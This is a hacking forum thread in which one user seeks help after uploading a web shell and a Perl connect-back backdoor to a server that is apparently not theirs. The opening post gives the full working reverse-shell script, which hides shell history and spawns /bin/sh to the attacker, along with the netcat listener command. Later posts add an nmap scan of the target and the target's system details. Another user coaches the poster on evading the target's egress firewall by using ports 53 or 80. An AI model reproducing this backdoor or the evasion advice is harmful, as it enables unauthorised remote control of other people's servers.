System Info: Linux 2.6.27-6_1.intel.BHsmp #1 SMP Thu Nov 13 15:27:29 MST 2008
x86_64
Disabled functions: NONE
cURL: ON
Register globals: OFF
MySQL: ON
MSSQL: OFF
PostgreSQL: ON
Oracle: OFF
Safe-mode: OFF (not secure)
[/code]
??????????????????????
waraxe
Posted: Sun Nov 23, 2008 2:35 pm Post subject:
If you are sure, that your PC can be reached from Internet, then try to use TCP port 53 instead of 2121. Because webserver needs this port for outgoing DNS requests, then it may be useable for your intentions. That's if target's network-level security is not tighter.
hottox
Posted: Sun Nov 23, 2008 2:28 pm Post subject:
it's the target's scan,
port is open, and the firewall is disabled,
waraxe
Posted: Sun Nov 23, 2008 2:14 pm Post subject:
What computer did you scan? Webserver? I meant your own PC, where NC is in listening mode.
|_ robots.txt: is empty or has no disallowed entries
2085/tcp closed unknown
2086/tcp open http cPanel httpd 11.23.6
|_ HTML title: cPanel® 11
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = Web Host Manager
2087/tcp open ssl/http cPanel httpd 11.23.6
|_ SSLv2: server still supports SSLv2
|_ HTML title: cPanel® 11
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = Web Host Manager
2088/tcp closed unknown
2089/tcp closed unknown
2090/tcp closed unknown
2091/tcp closed unknown
2092/tcp closed unknown
2093/tcp closed unknown
2094/tcp closed unknown
2095/tcp open http cPanel httpd 11.23.6
|_ HTML title: cPanel® 11
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = WebMail
2096/tcp open ssl/http cPanel httpd 11.23.6
|_ SSLv2: server still supports SSLv2
|_ HTML title: cPanel® 11
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = WebMail
2097/tcp closed unknown
6666/tcp closed irc
8082/tcp closed blackice-alerts
8083/tcp closed unknown
8585/tcp closed unknown
8586/tcp closed unknown
19638/tcp closed unknown
Code:
waraxe
Posted: Sun Nov 23, 2008 1:51 pm Post subject:
This can be firewalling issue on webserver's side. Try common ports like 53,80, ...
And are you sure that your port 2121 is open on your side? No firewall? No router/NAT between? Maybe you need port forward. I suggest to run NC in listening mode on your PC and then use some online port scanner and see, if your open port is reachable from the Internet.
hottox
Posted: Sun Nov 23, 2008 1:33 pm Post subject: Need HELP, perl reverse shell .....
Hi everybody,
so, this is my probleme, i uploaded a shell on a server, then i uploaded a perl backdoor "chmod 0755",
script:
Code:
#!/usr/bin/perl
use IO::Socket;
#cONNECT BACKDOOR EDITED BY XORON
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(xoron) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
i run netcat:
Code:
nc -vv -l -p 2121
then, via the php shell:
Code:
perl dc.pl [My ip] [port]
and the result : Unable to Connect Host.
I tested the script on the localhost and I had a shell,
i need your help to solve that problem.
Waiting for reply